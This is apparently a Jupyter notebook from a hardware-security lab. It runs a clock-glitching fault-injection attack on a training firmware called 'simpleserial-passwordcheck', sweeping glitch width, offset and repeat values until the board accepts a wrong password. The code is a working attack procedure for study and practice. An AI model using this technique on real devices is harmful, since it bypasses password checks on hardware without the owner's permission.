# Attack Password with Glitching VII

In [ ]:
%run '../util/Metadata.ipynb'
print_metadata()

<h1>Table of Contents<span class="tocSkip"></span></h1>
<div class="toc"><ul class="toc-item"><li><span><a href="#Basic-Setup" data-toc-modified-id="Basic-Setup-1"><span class="toc-item-num">1&nbsp;&nbsp;</span>Basic Setup</a></span></li><li><span><a href="#Helper-Functions-for-Password-Attack" data-toc-modified-id="Helper-Functions-for-Password-Attack-2"><span class="toc-item-num">2&nbsp;&nbsp;</span>Helper Functions for Password Attack</a></span></li><li><span><a href="#Test-Password-check-function" data-toc-modified-id="Test-Password-check-function-3"><span class="toc-item-num">3&nbsp;&nbsp;</span>Test Password check function</a></span></li><li><span><a href="#Glitching" data-toc-modified-id="Glitching-4"><span class="toc-item-num">4&nbsp;&nbsp;</span>Glitching</a></span><ul class="toc-item"><li><span><a href="#Clock-Glitch-Setup" data-toc-modified-id="Clock-Glitch-Setup-4.1"><span class="toc-item-num">4.1&nbsp;&nbsp;</span>Clock Glitch Setup</a></span></li><li><span><a href="#Scan-all-Parameters" data-toc-modified-id="Scan-all-Parameters-4.2"><span class="toc-item-num">4.2&nbsp;&nbsp;</span>Scan all Parameters</a></span></li><li><span><a href="#Test-specific-findings" data-toc-modified-id="Test-specific-findings-4.3"><span class="toc-item-num">4.3&nbsp;&nbsp;</span>Test specific findings</a></span></li><li><span><a href="#Test-Single-Password-try" data-toc-modified-id="Test-Single-Password-try-4.4"><span class="toc-item-num">4.4&nbsp;&nbsp;</span>Test Single Password try</a></span></li></ul></li><li><span><a href="#Disconnect" data-toc-modified-id="Disconnect-5"><span class="toc-item-num">5&nbsp;&nbsp;</span>Disconnect</a></span></li></ul></div>

## Basic Setup

Define Variables

In [ ]:
%run "../util/Init.ipynb"

Build target and upload

In [ ]:
TARGET = 'simpleserial-passwordcheck'
%store TARGET
%run "$HELPERSCRIPTS/Prepare.ipynb"

Import helper functions

In [ ]:
%run "$HELPERSCRIPTS/Setup_Generic.ipynb"

In [ ]:
scope.adc.samples = 5

## Helper Functions for Password Attack

In [ ]:
from bokeh.plotting import figure, show 
from bokeh.io import push_notebook, show, output_notebook
from bokeh.models import CrosshairTool, Label, HoverTool
from bokeh.layouts import row
from bokeh.colors import Color, RGB

output_notebook()

In [ ]:
import warnings
import tqdm
import numpy as np

command = '1'
"""Command to execute"""

password_length = 8
"""Number of bytes of password"""

def target_set_password(password):
    target.simpleserial_write('p', password)
    return target.simpleserial_read('r', password_length)

def target_check_password(command, password):
    target.simpleserial_write(command, password)
    return bytes(target.simpleserial_read('r', 1))[0] == 0


In [ ]:
def init_plot(xrange, yrange):
    p1 = figure(x_range = xrange, y_range = yrange, sizing_mode='stretch_width')
    p1.circle([xrange[0]],[yrange[0]], size = 0)
    t = show(p1, notebook_handle = True)
    return p1, t

In [ ]:
def update_plot(p1, handle_t, points_x, points_y, point_color):
    p1.square(points_x, points_y, color = point_color, size = 20)
    push_notebook(handle=handle_t)

## Test Password check function

In [ ]:
password = b'ifx2019a'
check = b'ifx2019b'
target_set_password(password)
target_check_password(command, password) and not target_check_password(command, check)

## Glitching
### Clock Glitch Setup

In [ ]:
scope.glitch.clk_src = "clkgen"
scope.glitch.output = "clock_xor"
scope.glitch.trigger_src = "ext_single"
scope.io.hs2 = "glitch"

print(scope.glitch)

In [ ]:
class Range:
    def __init__(self, min, max, step):
        self.min = min
        self.max = max
        self.step = step

    def __iter__(self):
        return iter(range(self.min, self.max + 1, self.step))

In [ ]:
pass_guess = b'xxxxxxxx'

def target_glitch_password():
    reset_target(scope)
    scope.arm()
    target.simpleserial_write(command, pass_guess)
    ret = scope.capture()
 
    res = target.simpleserial_read('r', 1)
    if res != None:
        return bytes(res)[0] == 0x00
    return False

### Scan all Parameters 

In [ ]:
pass_guess = b'ifx2019b'
attack1_data = []

width_range = Range(-10, 10, 1)
"""Range to test for scope.glitch.width"""

offset_range = Range(-10, 10, 1)
"""Range to test for scope.glitch.offset"""

repeat_range = Range(5, 5, 1)
"""Range to test for scope.glitch.repeat"""

sample_size = 4
"""Numer of samples to record for each setting"""

scope.glitch.width = width_range.min

p, t = init_plot((width_range.min - 0.5, width_range.max), (offset_range.min - 1.5, offset_range.max + 1))
p.add_tools(HoverTool())

for width in width_range:
    for offset in offset_range:
        for repeat in repeat_range:
            # Setup scope.glitch
            scope.glitch.offset = offset
            scope.glitch.width = width
            scope.glitch.repeat = repeat

            # Perform glitches
            successes = sum(target_glitch_password() for _ in range(sample_size))

            # Record and plot data
            if successes > 0:
                attack1_data.append((scope.glitch.width, scope.glitch.offset, scope.glitch.repeat, successes))
                color = Color.lighten(RGB(0x00, 0xff, 0x00), -((successes / sample_size) / 2.0 - 0.25))
            else:
                color = 'red'
            
            update_plot(p, t, width, offset, color)

In [ ]:
for data in attack1_data:
    print(data)

### Test specific findings

In [ ]:
test_width = 1.5625
test_range = -8.984375

repeat_range = Range(1, 10, 1)
"""Range to test for scope.glitch.repeat"""

sample_size = 10
"""Numer of samples to record for each setting"""

attack2_data = []

scope.glitch.width = test_width
scope.glitch.offset = test_range
for repeat in repeat_range:
    scope.glitch.repeat = repeat
    
    # Perform glitches
    successes = sum(target_glitch_password() for _ in range(sample_size))

    if successes > 0:
        attack2_data.append((scope.glitch.width, scope.glitch.offset, scope.glitch.repeat, successes))
        print(attack2_data[-1])

### Test Single Password try

In [ ]:
from tqdm import tnrange

test_width = 1.5625
test_range = -8.984375
test_repeat = 6

scope.glitch.width = test_width
scope.glitch.offset = test_range
scope.glitch.repeat = test_repeat
    
if target_glitch_password():
    print('Target says: Password correct')
else:
    print('Target says: Password wrong')

## Disconnect

In [ ]:
scope.dis()
target.dis()